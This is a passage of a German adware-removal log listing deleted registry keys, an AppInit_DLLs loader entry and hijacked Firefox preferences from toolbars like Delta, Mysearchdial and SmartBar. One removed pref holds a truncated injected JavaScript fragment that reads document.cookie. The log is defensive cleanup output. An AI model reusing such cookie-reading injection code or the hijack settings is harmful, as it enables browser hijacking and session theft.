Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AA74D58F-ACD0-450D-A85E-6C04B171C044}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AAA38851-3CFF-475F-B5E0-720D3645E4A5}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF99BD32-C1FB-11D2-892F-0090271D4F88}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{FE063412-BEA4-4D76-8ED3-183BE6220D17}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B92742C8-903F-6740-0B5A-F4F00ABBBCAC}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{11111111-1111-1111-1111-110311391106}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{7F6AFBF1-E065-4627-A2FD-810366367D01}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{A1E28287-1A31-4B0F-8D05-AA8C465D3C5A}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{11111111-1111-1111-1111-110311391106}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{AAA38851-3CFF-475F-B5E0-720D3645E4A5}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{219046AE-358F-4CF1-B1FD-2B4DE83642A8}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{348C2DF3-1191-4C3E-92A6-B3A89A9D9C85}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4D79-A620-CCE0C0A66CC9}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}

Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}

Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{0CFBE80D-5608-4309-A0F5-3B1414833432}]

Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{3004627E-F8E9-4E8B-909D-316753CBA923}]

Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{82E1477C-B154-48D3-9891-33D83C26BCD3}]

Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]

Wert Gelöscht : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{539F76FD-084E-4858-86D5-62F02F54AE86}]

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{0400EBCA-042C-4000-AA89-9713FBEDB671}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{06E50566-0AB7-431C-841D-62794727DAF9}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{0BD19251-4B4B-4B94-AB16-617106245BB7}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{1231839B-064E-4788-B865-465A1B5266FD}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{1AD27395-1659-4DFF-A319-2CFA243861A5}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{1F8EDE97-36D5-422A-B8F0-9406E2D87C60}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{26E7211D-0650-43CF-8498-4C81E83AEAAA}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{2DAC2231-CC35-482B-97C5-CED1D4185080}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{3281114F-BCAB-45E3-80D9-A6CD64D4E636}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{3F1CD84C-04A3-4EA0-9EA1-7D134FD66C82}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{3F83A9CA-B5F0-44EC-9357-35BB3E84B07F}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{44533FCB-F9FB-436A-8B6B-CF637B2D465A}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{44B29DDD-CF7A-454A-A275-A322A398D93F}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{47E520EA-CAD2-4F51-8F30-613B3A1C33EB}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{57C91446-8D81-4156-A70E-624551442DE9}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{70AFB7B2-9FB5-4A70-905B-0E9576142E1D}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{7AD65FD1-79E0-406D-B03C-DD7C14726D69}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{97DD820D-2E20-40AD-B01E-6730B2FCE630}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{9EDC0C90-2B5B-4512-953E-35767BAD5C67}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{A4DE94DB-DF03-45A3-8A5D-D1B7464B242D}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{AA0F50A8-2618-4AE4-A779-9F7378555A8F}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{B177446D-54A4-4869-BABC-8566110B4BE0}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{B2DB115C-8278-4947-9A07-57B53D1C4215}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{B97FC455-DB33-431D-84DB-6F1514110BD5}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{C67281E0-78F5-4E49-9FAE-4B1B2ADAF17B}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{D54C859C-6066-4F31-8FE0-2AAEDCAE67D7}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{D9D1DFC5-502D-43E4-B1BB-4D0B7841489A}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{E0B07188-A528-4F9E-B2F7-C7FDE8680AE4}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{E72E9312-0367-4216-BFC7-21485FA8390B}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{F05B12E1-ADE8-4485-B45B-898748B53C37}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{F6CCB6C9-127E-44AE-8552-B94356F39FFE}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{FFD25630-2734-4AE9-88E6-21BF6525F3FE}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355395506}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366396606}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}

Wert Gelöscht : HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist [1]

Schlüssel Gelöscht : HKCU\Software\BABSOLUTION

Schlüssel Gelöscht : HKCU\Software\BI

Schlüssel Gelöscht : HKCU\Software\BonanzaDealsLive

Schlüssel Gelöscht : HKCU\Software\Conduit

Schlüssel Gelöscht : HKCU\Software\DataMngr

[#] Schlüssel Gelöscht : HKCU\Software\DataMngr_Toolbar

Schlüssel Gelöscht : HKCU\Software\Default Tab

Schlüssel Gelöscht : HKCU\Software\DefaultTab

Schlüssel Gelöscht : HKCU\Software\Delta

Schlüssel Gelöscht : HKCU\Software\DownTango

Schlüssel Gelöscht : HKCU\Software\ExpressFiles

Schlüssel Gelöscht : HKCU\Software\GoforFiles

Schlüssel Gelöscht : HKCU\Software\InstallCore

Schlüssel Gelöscht : HKCU\Software\InstalledBrowserExtensions

Schlüssel Gelöscht : HKCU\Software\Minibar

Schlüssel Gelöscht : HKCU\Software\mysearchdial

Schlüssel Gelöscht : HKCU\Software\Optimizer Pro

Schlüssel Gelöscht : HKCU\Software\ParetoLogic

Schlüssel Gelöscht : HKCU\Software\RegisteredApplicationsEx

Schlüssel Gelöscht : HKCU\Software\Smart PC Cleaner

Schlüssel Gelöscht : HKCU\Software\Softonic

Schlüssel Gelöscht : HKCU\Software\Somoto

Schlüssel Gelöscht : HKCU\Software\StartSearch

Schlüssel Gelöscht : HKCU\Software\TENCENT

Schlüssel Gelöscht : HKCU\Software\visualbee

Schlüssel Gelöscht : HKCU\Software\AppDataLow\SProtector

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\BackgroundContainer

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\Conduit

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\ConduitSearchScopes

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\Crossrider

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\DefaultTab

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\PriceGong

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\SmartBar

Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\visualbee

Schlüssel Gelöscht : HKLM\Software\Babylon

Schlüssel Gelöscht : HKLM\Software\BonanzaDealsLive

Schlüssel Gelöscht : HKLM\Software\Conduit

Schlüssel Gelöscht : HKLM\Software\DataMngr

Schlüssel Gelöscht : HKLM\Software\Default Tab

Schlüssel Gelöscht : HKLM\Software\DefaultTab

Schlüssel Gelöscht : HKLM\Software\Delta

Schlüssel Gelöscht : HKLM\Software\DownTango

Schlüssel Gelöscht : HKLM\Software\Driver-Soft

Schlüssel Gelöscht : HKLM\Software\ExpressFiles

Schlüssel Gelöscht : HKLM\Software\GoforFiles

Schlüssel Gelöscht : HKLM\Software\InstallCore

Schlüssel Gelöscht : HKLM\Software\InstallIQ

Schlüssel Gelöscht : HKLM\Software\Minibar

Schlüssel Gelöscht : HKLM\Software\ParetoLogic

Schlüssel Gelöscht : HKLM\Software\SP Global

Schlüssel Gelöscht : HKLM\Software\SProtector

Schlüssel Gelöscht : HKLM\Software\TENCENT

Schlüssel Gelöscht : HKLM\Software\Uniblue

Schlüssel Gelöscht : HKLM\Software\visualbee

Schlüssel Gelöscht : HKLM\Software\Vittalia

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\ExpressFiles

Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\GoforFiles

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CA41BB14-E67B-1653-C57B-5CA99418A866}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\bi_uninstaller

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DefaultTab Chrome

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DefaultTab

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Delta Chrome Toolbar

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Delta

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DownTango

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Driver Genius_is1

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FilesFrog Update Checker

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mysearchdial

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Optimizer Pro_is1

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SkypEmoticons_is1

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart PC Cleaner_is1

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SmartBar

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Vittalia

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Tarma Installer

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{889DF117-14D1-44EE-9F31-C5FB5D47F68B}

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Optimizer Pro_is1

Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OptimizerPro

Daten Gelöscht : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\progra~3\bitguard\271769~1.27\{c16c1~1\bitguard.dll

***** [ Browser ] *****

-\\ Internet Explorer v9.0.8112.16476

Einstellung Wiederhergestellt : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]

Einstellung Wiederhergestellt : HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs]

Einstellung Wiederhergestellt : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]

-\\ Mozilla Firefox v8.0 (de)

[ Datei : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\prefs.js ]

Zeile gelöscht : user_pref("browser.startup.homepage", "hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCt[...]

Zeile gelöscht : user_pref("browser.search.selectedEngine", "Mysearchdial");

Zeile gelöscht : user_pref("browser.search.defaultenginename", "Mysearchdial");

[ Datei : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\prefs.js ]

Zeile gelöscht : user_pref("aol_toolbar.default.homepage.check", false);

Zeile gelöscht : user_pref("aol_toolbar.default.search.check", false);

Zeile gelöscht : user_pref("browser.newtab.url", "hxxp://www.delta-search.com/?affID=119290&tt=gc_&babsrc=NT_ss&mntrId=44744C0F6E75536C");

Zeile gelöscht : user_pref("browser.search.order.1", "Delta Search");

Zeile gelöscht : user_pref("browser.search.selectedEngine", "Mysearchdial");

Zeile gelöscht : user_pref("extensions.BabylonToolbar.prtkDS", 0);

Zeile gelöscht : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);

Zeile gelöscht : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "WebSearch");

Zeile gelöscht : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "WebSearch");

Zeile gelöscht : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "hxxp://websearch.pu-results.info/?pid=724&r=2013/05/08&hid=4175303324&lg=EN&cc=VN");

Zeile gelöscht : user_pref("sweetim.toolbar.previous.keyword.URL", "hxxp://websearch.pu-results.info/?pid=724&r=2013/05/08&hid=4175303324&lg=EN&cc=VN&l=1&q=");

Zeile gelöscht : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", ".*");

Zeile gelöscht : user_pref("sweetim.toolbar.searchguard.enable", "false");

Zeile gelöscht : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "1");

Zeile gelöscht : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "1");

Zeile gelöscht : user_pref("browser.search.defaultenginename", "Mysearchdial");

[ Datei : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\prefs.js ]

Zeile gelöscht : user_pref("browser.newtab.url", "hxxp://vn.hao123.com/?tn=smt_pay_hp_01_hao123_vn");

Zeile gelöscht : user_pref("browser.search.defaultenginename,S", "WebSearch");

Zeile gelöscht : user_pref("browser.search.defaulturl", "hxxp://www.bigseekpro.com/search/toolbar/hao123/{432AC9A6-96B0-51C9-30FF-0D2441E553C0}?q={searchTerms}");

Zeile gelöscht : user_pref("browser.search.order.1,S", "WebSearch");

Zeile gelöscht : user_pref("browser.search.selectedEngine,S", "WebSearch");

Zeile gelöscht : user_pref("extensions.delta.admin", false);

Zeile gelöscht : user_pref("extensions.delta.aflt", "babsst");

Zeile gelöscht : user_pref("extensions.delta.appId", "{C26644C4-2A12-4CA6-8F2E-0EDE6CF018F3}");

Zeile gelöscht : user_pref("extensions.delta.autoRvrt", "false");

Zeile gelöscht : user_pref("extensions.delta.dfltLng", "en");

Zeile gelöscht : user_pref("extensions.delta.excTlbr", false);

Zeile gelöscht : user_pref("extensions.delta.ffxUnstlRst", true);

Zeile gelöscht : user_pref("extensions.delta.id", "4474f90e0000000000004c0f6e75536c");

Zeile gelöscht : user_pref("extensions.delta.instlDay", "15858");

Zeile gelöscht : user_pref("extensions.delta.instlRef", "sst");

Zeile gelöscht : user_pref("extensions.delta.newTab", false);

Zeile gelöscht : user_pref("extensions.delta.prdct", "delta");

Zeile gelöscht : user_pref("extensions.delta.prtnrId", "delta");

Zeile gelöscht : user_pref("extensions.delta.rvrt", "false");

Zeile gelöscht : user_pref("extensions.delta.smplGrp", "none");

Zeile gelöscht : user_pref("extensions.delta.tlbrId", "base");

Zeile gelöscht : user_pref("extensions.delta.tlbrSrchUrl", "");

Zeile gelöscht : user_pref("extensions.delta.vrsn", "1.8.21.5");

Zeile gelöscht : user_pref("extensions.delta.vrsnTs", "1.8.21.518:32:00");

Zeile gelöscht : user_pref("extensions.delta.vrsni", "1.8.21.5");

Zeile gelöscht : user_pref("extensions.delta_i.babExt", "");

Zeile gelöscht : user_pref("extensions.delta_i.babTrack", "affID=119290&tt=gc_");

Zeile gelöscht : user_pref("extensions.delta_i.srcExt", "ss");

Zeile gelöscht : user_pref("extensions.irmysearch.aflt", "irmsd0101");

Zeile gelöscht : user_pref("extensions.irmysearch.cd", "2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T");

Zeile gelöscht : user_pref("extensions.irmysearch.cr", "1727878116");

Zeile gelöscht : user_pref("extensions.irmysearch.instlRef", "");

Zeile gelöscht : user_pref("extensions.kango.storage.minibar.config", "{\"name\":\"Hao123 toolbar\",\"description\":\"Hao123 toolbar\",\"button\":{\"tooltip\":\"Search\",\"icon\":\"hxxp://www.bigspeedpro.com/button/%a[...]

Zeile gelöscht : user_pref("extensions.kango.storage.minibar.homepageSet", "\"1\"");

Zeile gelöscht : user_pref("extensions.kango.storage.minibar.searchassistSet", "\"1\"");

Zeile gelöscht : user_pref("extensions.kango.storage.minibar.searchengineSet", "\"1\"");

Zeile gelöscht : user_pref("extensions.kango.storage.ui.button.iconCache", "\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAED0lEQVQ4ja3MTU+TBwDA8X4Ij7pEDDqUqDHb3FzmoRqjyaaZS4wuJh7U7WCiJFMRKDqth[...]

Zeile gelöscht : user_pref("extensions.mNw7YgSF_.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]

Zeile gelöscht : user_pref("extensions.mysearchdial.AL", 2);

Zeile gelöscht : user_pref("extensions.mysearchdial.aflt", "irmsd0101");

Zeile gelöscht : user_pref("extensions.mysearchdial.appId", "{CA5CAA63-B27C-4963-9BEC-CB16A36D56F8}");

Zeile gelöscht : user_pref("extensions.mysearchdial.cd", "2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T");

Zeile gelöscht : user_pref("extensions.mysearchdial.cr", "1727878116");

Zeile gelöscht : user_pref("extensions.mysearchdial.dfltLng", "");

Zeile gelöscht : user_pref("extensions.mysearchdial.dfltSrch", true);

Zeile gelöscht : user_pref("extensions.mysearchdial.dnsErr", true);

Zeile gelöscht : user_pref("extensions.mysearchdial.excTlbr", false);

Zeile gelöscht : user_pref("extensions.mysearchdial.hmpg", true);

Zeile gelöscht : user_pref("extensions.mysearchdial.hmpgUrl", "hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutD[...]

Zeile gelöscht : user_pref("extensions.mysearchdial.id", "60EB69562F4EF90E");

Zeile gelöscht : user_pref("extensions.mysearchdial.instlDay", "16082");

Zeile gelöscht : user_pref("extensions.mysearchdial.instlRef", "");

Zeile gelöscht : user_pref("extensions.mysearchdial.newTabUrl", "hxxp://start.mysearchdial.com/?f=2&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1Czu[...]

Zeile gelöscht : user_pref("extensions.mysearchdial.prdct", "mysearchdial");

Zeile gelöscht : user_pref("extensions.mysearchdial.prtnrId", "mysearchdial");

Zeile gelöscht : user_pref("extensions.mysearchdial.srchPrvdr", "Mysearchdial");

Zeile gelöscht : user_pref("extensions.mysearchdial.tlbrId", "base");

Zeile gelöscht : user_pref("extensions.mysearchdial.tlbrSrchUrl", "hxxp://start.mysearchdial.com/?f=3&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1C[...]

Zeile gelöscht : user_pref("extensions.mysearchdial.vrsn", "1.8.21.0");

Zeile gelöscht : user_pref("extensions.mysearchdial.vrsni", "1.8.21.0");

Zeile gelöscht : user_pref("extensions.mysearchdial_i.hmpg", true);

Zeile gelöscht : user_pref("extensions.mysearchdial_i.newTab", false);

Zeile gelöscht : user_pref("extensions.mysearchdial_i.smplGrp", "none");

Zeile gelöscht : user_pref("extensions.mysearchdial_i.vrsnTs", "1.8.21.022:4:59");

Zeile gelöscht : user_pref("extensions.smartbar.admin", false);

Zeile gelöscht : user_pref("extensions.smartbar.aflt", "orgnl");

Zeile gelöscht : user_pref("extensions.smartbar.appId", "{C5E5951A-4ADD-4402-8A8E-EF97DCB9D8EC}");

Zeile gelöscht : user_pref("extensions.smartbar.autoRvrt", "false");

Zeile gelöscht : user_pref("extensions.smartbar.dfltLng", "");

Zeile gelöscht : user_pref("extensions.smartbar.dfltSrch", true);

Zeile gelöscht : user_pref("extensions.smartbar.dnsErr", true);

Zeile gelöscht : user_pref("extensions.smartbar.excTlbr", false);

Zeile gelöscht : user_pref("extensions.smartbar.hmpg", true);

Zeile gelöscht : user_pref("extensions.smartbar.hmpgUrl", "hxxp://search.creativetoolbars.com/?src=hp&id=smartbar&g=");

Zeile gelöscht : user_pref("extensions.smartbar.hpOld0", "hxxp://vn.hao123.com/?tn=smt_pay_hp_01_hao123_vn");

Zeile gelöscht : user_pref("extensions.smartbar.id", "4474f90e0000000000004c0f6e75536c");

Zeile gelöscht : user_pref("extensions.smartbar.instlDay", "16153");

Zeile gelöscht : user_pref("extensions.smartbar.instlRef", "");

Zeile gelöscht : user_pref("extensions.smartbar.kw_url", "hxxp://search.creativetoolbars.com/results?src=tb&id=smartbar&g=&q=");

Zeile gelöscht : user_pref("extensions.smartbar.newTab", true);

Zeile gelöscht : user_pref("extensions.smartbar.newTabUrl", "hxxp://search.creativetoolbars.com/?src=nt&id=smartbar&g=");

Zeile gelöscht : user_pref("extensions.smartbar.prdct", "smartbar");

Zeile gelöscht : user_pref("extensions.smartbar.prtnrId", "bechiro");

Zeile gelöscht : user_pref("extensions.smartbar.rvrt", "false");

Zeile gelöscht : user_pref("extensions.smartbar.smplGrp", "mm");

Zeile gelöscht : user_pref("extensions.smartbar.srchPrvdr", "Search the web (CT)");

Zeile gelöscht : user_pref("extensions.smartbar.tlbrId", "smartbar");

Zeile gelöscht : user_pref("extensions.smartbar.tlbrSrchUrl", "hxxp://search.creativetoolbars.com/results?src=tb&id=smartbar&g=&q=");

Zeile gelöscht : user_pref("extensions.smartbar.vrsn", "1.8.8.12");

Zeile gelöscht : user_pref("extensions.smartbar.vrsnTs", "1.8.8.1222:13:42");

Zeile gelöscht : user_pref("extensions.smartbar.vrsni", "1.8.8.12");

Zeile gelöscht : user_pref("extentions.y2layers.defaultEnableAppsList", "DropDownDeals,buzzdock,YontooNewOffers");

Zeile gelöscht : user_pref("extentions.y2layers.installId", "03851a0f-1450-4d0a-995b-4ef0cdbf29b0");

Zeile gelöscht : user_pref("keyword.URL", "hxxp://www.bigseekpro.com/search/toolbar/hao123/{432AC9A6-96B0-51C9-30FF-0D2441E553C0}?q=");

[ Datei : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\prefs.js ]

Zeile gelöscht : user_pref("aol_toolbar.default.homepage.check", false);

Zeile gelöscht : user_pref("aol_toolbar.default.search.check", false);

Zeile gelöscht : user_pref("browser.newtab.url", "hxxp://visualbee.delta-search.com/?babsrc=NT_ss&mntrId=44744C0F6E75536C&affID=121377&tsp=5004");

Zeile gelöscht : user_pref("browser.search.defaultenginename", "Mysearchdial");

Zeile gelöscht : user_pref("browser.search.selectedEngine", "Mysearchdial");

Zeile gelöscht : user_pref("extensions.BabylonToolbar.prtkDS", 0);

Zeile gelöscht : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);

Zeile gelöscht : user_pref("extensions.crossrider.bic", "1416a701b2c7b5027a0abd74f16d3a66");